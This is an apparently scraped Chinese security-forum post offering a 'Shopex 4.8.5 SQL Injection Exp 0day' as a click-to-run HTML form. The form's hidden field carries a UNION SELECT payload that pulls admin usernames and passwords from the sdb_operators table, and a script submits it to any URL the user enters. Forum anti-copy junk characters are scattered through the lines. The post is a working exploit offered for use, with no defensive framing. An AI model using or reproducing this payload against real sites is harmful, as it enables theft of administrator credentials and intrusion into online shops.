中国网络渗透测试联盟

标题: Shopex 4.8.5 SQL Injection Exp 0day [打印本页]
作者: admin    时间: 2013-1-23 09:20
标题: Shopex 4.8.5 SQL Injection Exp 0day
<center>8 Z$ J  m' I& r1 W) F3 @5 ^
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>  G* y5 i8 D" C2 w- @# \, p
<form action="" method="post" name="submit_url"># a; X5 v/ m6 g3 A  o- S
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>( g1 e! L, o0 s/ a7 H. u/ `' B
<input type="hidden" name="goods[goods_id]" value="3">  W: j8 L" w% x( `$ X! O
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">7 E6 _$ E/ m! S$ e. M& b9 A8 J1 {
<input type="submit" value="给我注入"  onclick=fsubmit()>7 l6 i- Y* F2 ^6 S# z( m2 b& c
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com1 s/ t& O9 e! A5 C" \  j) X

8 K* ?$ Q0 i9 @0 e<script> & v: L5 M8 E; [- y
function fsubmit(){ # l) z1 I9 s6 Z/ d" k
form = document.forms[0]; + s% F! @$ U" R1 P; d" p/ J
form.action = form.url.value+'/?product-gnotify'; 0 Q+ I7 ^2 ^( v' U; o
form.submit();
1 l! b: y9 Y; P% J7 K" l; }}
6 F% L- U) q  }2 M. U* b</script>; O$ [0 C- q$ l* K, r6 u' s




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2